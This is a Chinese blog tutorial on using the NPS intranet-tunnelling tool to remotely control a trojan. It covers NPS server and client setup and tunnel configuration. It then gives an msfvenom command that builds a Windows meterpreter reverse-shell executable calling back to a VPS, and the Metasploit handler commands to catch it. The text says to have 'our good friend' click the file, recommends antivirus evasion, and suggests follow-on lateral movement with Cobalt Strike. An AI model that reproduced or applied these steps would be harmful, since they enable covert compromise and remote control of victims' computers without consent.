NPS内网穿透实现木马远控

于 2024-07-16 15:48:02 发布
阅读量385 收藏 3
点赞数 3
分类专栏: 教程 文章标签: linux 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MRS_jianai/article/details/140468464
版权

NPS安装部署

NPS分为服务端和客户端,服务端一般部署在云服务器,客户端一般部署在PC。
伟大的作者已经给咱们打包好了,按需下载即可,server为服务端版本,client为客户端版本:

https://github.com/ehang-io/nps/releases/tag/v0.26.10

image.png
如果你跟我一样,找不到自己想要的版本,也可以自己编译。编译需要go语言环境:

源码地址:https://github.com/ehang-io/nps

编译命令:
    服务端:go build cmd/nps/nps.go
    客户端:go build cmd/npc/npc.go

image.png
参考文献:https://ehang-io.github.io/nps/#/run

服务端

下载服务端文件之后,可在conf目录下的nps.conf文件中进行简单的配置,其中包括端口、用户名、密码等。
image.png
具体参数说明如下,可按需配置,默认也行。
image.png
根据自己的需求进行配置之后即可进行安装,安装也很简单,只需一条命令:

./nps install

image.png
到这里就成功了!
image.png
安装完成之后就可以启动了:

./nps start

image.png
启动之后就可以在网页端访问了!
地址: ip:端口号
如果端口没改的话默认为8080。
记得在服务器控制台开启对应的端口。
image.png
默认用户名密码为:admin/123
登陆成功后,在客户端中新增一条:
image.png
image.png
新增成功后我们就得到这么一条:
image.png

客户端

客户端下载好对应的版本之后,只需运行一条命令,服务端页面中已经给出来了。
image.png
这样就说明了连接成功了!
image.png
这时候再返回服务端查看,已经是在线状态了
image.png

创建隧道

点击后面的隧道:
image.png
需要配置以下内容:
服务端转发端口:生成木马时写的端口
内网上线端口:msf监听的端口
image.png
好了之后是这个样子:
image.png

生成木马

然后我们打开msf,生成我们的木马:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=vps的ip地址 LPORT=8025 -f exe -o nps.exe

image.png
然后开启监听:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run

image.png
然后找我们的好朋友点一下:
image.png
然后可以看到msf上线了!
image.png

扩展

  • 这种裸奔的木马一般都是被秒识别,所以可以需要做个免杀。
  • 如果需要后续渗透,上传文件,或者横向扩展等操作,搭配cs使用效果更佳。
小秋LY
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
一款远控木马分析,仅供学习思路用途
moran0322的博客
06-24 4万+
最近一段时间在面试病毒相关岗位,有的公司会电话、远程面试询问相关知识,有的则会直接发送病毒样本要求分析,写出分析报告。下面要分析的就是面试过程中的某个样本,整理成文,发表出来,供大家参考学习,一起进步!如有不当之处,也希望大佬批评指正,晚辈一定虚心受教。 由于考虑到时间问题,不能让面试官等太久,所以我只将病毒关键功能模块进行分析说明,没有之前文章那么详细,也请大家见谅,不懂之处欢迎提出,我也尽量...
NPS内网穿透
不眠的博客
09-01 966
nps一款轻量级、高性能、功能强大的内网穿透代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用来访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。
New免杀工具NPS更新5.21(附下载)
Python_0011的博客
05-27 380
ps通信流量比较稳定,但特征抓的比较死,所以基于原版的nps进行二次开发,为了工具的免杀性及其后期修改,本人不公开源码,只能简单进行二开。1)重写了nps的认证过程,通信过程均进行加2)重些了npc的部分,预计后续分离config文件进行加载3)进行了nps未授权漏洞的修复,避免了默认配置未授权。
免杀nps—payload安装及使用
weixin_50683638的博客
05-22 612
1.git clone https://github.com/trustedsec/nps_payload 克隆到虚拟机中 2.安装py依赖pip install -r requirements.txt报错 3…导出本地环境所有依赖 4.导出指定目录下的依赖pip install pipreqs pipreqs requirements.txt如果报错执行pipreqs ./ --encoding=utf8 5.运行python nps_payload.py 6.如果报错这个看报错原因权限不够添
使用NPS自建内网穿透服务器教程,带WEB管理
weixin_43974276的博客
03-16 1496
nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持TCP、UDP流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析、游戏私服、我的世界服务器等等……),此外还支持内网http代理、内网socks5代理、p2p等,同时支持snappy压缩、站点保护、加密传输、多路复用、header修改等。支持web图形化管理,集成多用户模式。案例:做微信公众号开发、小程序开发等----> 域名代理模式。
利用nps_payload 免杀360,腾讯电脑管家
lingmessy的博客
04-08 1080
利用nps_payload 免杀360,腾讯电脑管家 一、nps_payload介绍 nps_payload是2017年开源的工具,安装使用都比较简单,nps_payload可以生成基于msbuild的xml文件和独立执行的hta文件,并对xml文件和hta文件做了一定的混淆免杀,从而达到免杀的效果。 nps_payload生成的xml或hta文件都需要使用msbuild来执行。 Microsof...
内网穿透FRP&NPS&SPP&Ngrok
qq_74806534的博客
04-05 1264
注意:这里所有的但是靶机和kali主动连接服务器跳板机,所以靶机反向连接跳板机,kali正向连接跳板机,跳板机没办法转发给kali数据,只有kali去拿数据,因为在内网环境。开通后,主要是三种协议可以选择,我们选择tcp,更加稳定,隧道名称都行,远程端口选择可用端口,本地端口选择本地kali攻击机ip端口。全面的协议支持,兼容几乎所有常用的协议,如tcp、udp、http(s)、socks5、p2p、http代理...首先是在Ngrok官网创建账号,然后实名认证,再到开通隧道下,开通免费的服务器。
SSH端口转发实现内网穿透实现
09-14
主要介绍了SSH端口转发实现内网穿透实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
NPS内网穿透工具,服务器端(CentOS)+客户端(CentOS、Windows)
最新发布
04-30
综上所述,NPS内网穿透工具通过服务器端和客户端的配合,解决了内网设备对外的访问问题,无论是在Linux(如CentOS)还是Windows环境下都能方便地部署和使用。在实际应用中,NPS可以广泛应用于远程桌面、文件共享、...
NPS内网透传,Windows和Linux双平台client和server端
11-13
本文将详细介绍NPS内网透传在Windows和Linux双平台上的client和server端实现。 首先,我们来看NPS Server端的搭建。服务器端通常运行在具有固定公网IP的主机上,它的主要任务是接收来自外网的连接请求,并将这些...
介绍个好用的内网穿透工具:nps
01-09
最早开始接触内网穿透,是在调试微信支付的时候,微信需要回调一个公网地址,经过一番搜索,我选用了 natapp,优点是有免费隧道,缺点是公网域名和端口是随机分配的,偶尔调试用下还可以。 后来,因为要映射公司和...
内网穿透工具
07-05
内网穿透工具。不懂可以问我,教你怎么使用。
使用NPS搭建内网穿透服务器
Keep Coding,Keep Foolish!
09-01 271
NPS 内网穿透
内网穿透工具NPS(详细教程)
清瞳清的博客
11-15 1万+
有时候我们受限于硬件设备和网络的的问题,无法将内网的大容量、高性能存储设备或计算设备对外访问。这个时候就会变的特别苦恼,上云呢成本太大,不用云呢公网又无法直接访问,这个时候怎么办呢,NPS它来了!!!!
p70 内网安全-域横向内网漫游 Socks 代理隧道技术(NPS、FRP、CFS 三层内网漫游)
weixin_43263566的博客
05-03 3453
内网安全-域横向内网漫游 Socks 代理隧道技术(NPS、FRP、CFS 三层内网漫游)
NPC内网穿透教程-入门
aMaCoder
02-24 1530
releases下载对应的系统版本即可,服务端和客户端是单独的。
内网安全-隧道搭建&穿透上线&FRP&NPS&Ngrok
m0_65336233的博客
12-23 2334
内网安全-隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok
内网穿透工具nps使用教程 - 来自内部交流群
热门推荐
Rudon滨海渔村的博客
01-21 9万+
内网穿透工具nps使用教程.docx 内网穿透工具nps使用教程 感谢 感谢开源软件开发者,github链接https://github.com/cnlh/nps/ 感兴趣的去star下吧~ 视频教程 https://www.bilibili.com/video/av74707117;https://www.bilibili.com/video/av76554314 nps简介 与ngrok、frp等老牌内网穿透工具相比,nps可以算是一匹黑马。其优势主要有两点:一是强大的网页管理面板,
nps内网穿透实验连接外网
03-20
NPS内网穿透)是一种将内网服务暴露到外网的技术,可以实现通过公网访问内网中的服务。下面是一种常见的NPS内网穿透实验连接外网的步骤: 1. 安装和配置NPS服务器:首先,在外网服务器上安装和配置NPS服务器。NPS服务器是一个中转服务器,用于接收来自外网的请求并将其转发到内网中的目标服务。 2. 配置内网服务器:在内网服务器上安装并配置NPS客户端。NPS客户端会与NPS服务器建立连接,并将内网服务注册到NPS服务器上。 3. 配置端口映射:在NPS服务器上配置端口映射规则,将外网请求的端口映射到内网服务器上的对应端口。这样,当外网用户访问NPS服务器上的指定端口时,请求会被转发到内网服务器上的对应端口。 4. 测试连接:在外网环境下,使用外网IP地址和映射的端口访问NPS服务器。如果一切配置正确,请求将会被转发到内网服务器上,并可以正常访问内网服务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小秋LY

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值